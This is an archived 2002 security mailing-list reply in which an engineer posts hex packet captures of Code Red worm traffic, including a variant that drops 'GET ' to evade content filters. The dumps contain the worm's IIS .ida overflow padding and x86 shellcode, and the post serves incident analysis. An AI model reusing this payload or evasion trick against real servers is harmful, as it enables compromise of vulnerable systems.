Re(2): new codered worm penetrates content-filtering

From: Ken Eichman (keichmanat_private)
Date: Thu Jan 10 2002 - 11:10:58 PST

  • Next message: Robert Gile @Agoura: "RE: new codered worm penetrates content-filtering"

    > Not yet.  I have some questions, though:
    >
    > Do you have packet traces of one of these?  I'm curious as to what they
    > looks like, i.e. are they IP fragments, seperate TCP packets, etc..?
    >
    > Are the ones that have the "GET " seperated otherwise regular Code Red?
    > Have you caught a whole transaction?  It occurs that this could
    > potentially be a human attacker that figured out he had to bypass the
    > filter.  If they look like Code Red, grabbing one will tell you if it's a
    > variant or not.  If you get a packet trace of the whole thing, I can tell
    > you pretty quickly.
    
    Hi, I've got a bunch of traces of the code red packets without the GET.
    I haven't done any kind of analysis - only a quick glance, but it seems
    like this is just about the only code red I'm seeing lately. Here's a
    dump of one that hit me today, and beneath that is a random code red w/GET
    packet trace. I hope this helps.
    
    01/10-14:01:50.447296 0:6:28:9C:27:C0 -> 0:D0:B7:3B:2C:72 type:0x800 len:0x24E
    210.85.54.146:4985 -> 134.243.238.34:80 TCP TTL:42 TOS:0x0 ID:26199  DF
    ***PA* Seq: 0x248727E5   Ack: 0x38A2DC62   Win: 0x88E0
    2F 64 65 66 61 75 6C 74 2E 69 64 61 3F 4E 4E 4E  /default.ida?NNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E E9 30 39  NNNNNNNNNNNNN.09
    30 E6 38 35 38 EC 62 64 33 E7 38 30 31 E9 30 39  0.858.bd3.801.09
    30 E6 38 35 38 EC 62 64 33 E7 38 30 31 E9 30 39  0.858.bd3.801.09
    30 E6 38 35 38 EC 62 64 33 E7 38 30 31 E9 30 39  0.858.bd3.801.09
    30 E9 30 39 30 E8 31 39 30 E0 30 63 33 E0 30 30  0.090.190.0c3.00
    33 E8 62 30 30 E5 33 31 62 E5 33 66 66 E0 30 37  3.b00.31b.3ff.07
    38 E0 30 30 30 E0 30 3D 61 20 20 48 54 54 50 2F  8.000.0=a  HTTP/
    31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70  1.0..Content-typ
    65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F 53 54  e: text/xml.HOST
    3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A 20 41  :www.worm.com. A
    63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E 74 65  ccept: */*.Conte
    6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 39 20  nt-length: 3569
    0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 56 57  ....U........SVW
    8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC CC CC  ................
    F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A 0B 00  ....p...........
    00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 A1 00  ...h.........d..
    00 00 00 89 47 08 64 89 3D 00                    ....G.d.=.
    
    11/11-05:05:07.429410 0:6:28:9C:27:C0 -> 0:D0:B7:3B:2C:72 type:0x800 len:0x5CE
    203.59.219.242:4473 -> 134.243.10.195:80 TCP TTL:109 TOS:0x0 ID:38723  DF
    ***PA* Seq: 0x8DAB83B8   Ack: 0xBCDDAFBE   Win: 0x4320
    47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
    3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  ?NNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
    4E E9 30 39 30 E6 38 35 38 EC 62 64 33 E7 38 30  N.090.858.bd3.80
    31 E9 30 39 30 E6 38 35 38 EC 62 64 33 E7 38 30  1.090.858.bd3.80
    31 E9 30 39 30 E6 38 35 38 EC 62 64 33 E7 38 30  1.090.858.bd3.80
    31 E9 30 39 30 E9 30 39 30 E8 31 39 30 E0 30 63  1.090.090.190.0c
    33 E0 30 30 33 E8 62 30 30 E5 33 31 62 E5 33 66  3.003.b00.31b.3f
    66 E0 30 37 38 E0 30 30 30 E0 30 3D 61 20 20 48  f.078.000.0=a  H
    54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74  TTP/1.0..Content
    2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A  -type: text/xml.
    48 4F 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F  HOST:www.worm.co
    6D 0A 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43  m. Accept: */*.C
    6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33  ontent-length: 3
    35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00  569 ....U.......
    00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8  .SVW............
    CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00  ........p.......
    E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF  .......h........
    FF 64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00  .d......G.d.=...
    00 E9 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE  ..o.....`.......
    FF FF FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89  ........h.......
    85 F4 FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8  .......X......w.
    9B 0A 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00  ......p.........
    00 8B 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58  ...X...........X
    FE FF FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7  .....X......xu..
    85 58 FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33  .X.........X...3
    C0 66 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B  .f..=MZ.........
    8D 58 FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9  .X....Q<..X...3.
    66 8B 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00  f.....PE....y...
    8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B  ..X....B<..X....
    54 01 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B  T.x..X.....T....
    85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D  .T....H...X.....
    4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E  L.....L....:KERN
    0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45  ..3.....L....x.E
    4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89  L32.. .....X....
    8D 34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF  .4.....T.....X..
    FF 03 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF  ..B ..L.....H...
    00 00 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89  ........H.......
    8D 48 FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95  .H.....L........
    4C FE FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF  L.....T.....H...
    3B 48 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B  ;H.........L....
    02 8B 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85  ...X....<.GetP..
    A0 00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE  ......L.......X.
    FF FF 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00  ...|..rocA......
    8B 95 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE  ..H.....H.....X.
    FF FF 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04  ....T....H$3.f..
    0A 89 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10  ...L.....T....Q.
    8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF  ..L....L....L...
    8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE  ..L.....L.....L.
    FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85  ....L.....X.....
    54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF  T....H......L...
    8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE  ..L.....X.....p.
    FF FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD  ................
    F0 FE FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70  .....G.d.......p
    FE FF FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF  ....u..8.....L..
    FF 01 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01  .........L......
    89 8D 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85  ..L.....h.......
    C0 0F 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11  .........h......
    83 FA 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4  ...u!..h........
    50 FF 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85  P......;..CKCK..
    34 FE FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B  4....*....h...Q.
    95 34 FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43  .4...R..p...;..C
    4B 43 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF  KCK..L..........
    EB 0F 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF  ....h........h..
    FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2  ...h........t...
    8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9  ..h........h....
    53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68  S.....h........h
    FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE  ....M.........l.
    FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE  ....L...........
    FF FF 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE  ..h.E...........
    FF FF 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90  ..[SS.......cx..
    8B 4D 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE  .M..Q...P.....P.
    FF FF 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50  ...u&..j...L...P
    8B 8D 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95  ..h...Q.U..B.P..
    6C FE FF FF 3B F4 90 43 4B 43                    l...;..CKC
    
    Ken Eichman                  Senior Security Engineer
    Chemical Abstracts Service   Tel:   (614) 447-3838 ext 3230
    2540 Olentangy River Road    Fax:   (614) 447-3855
    Columbus, OH 43210           Email: keichmanat_private
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 14:28:47 PST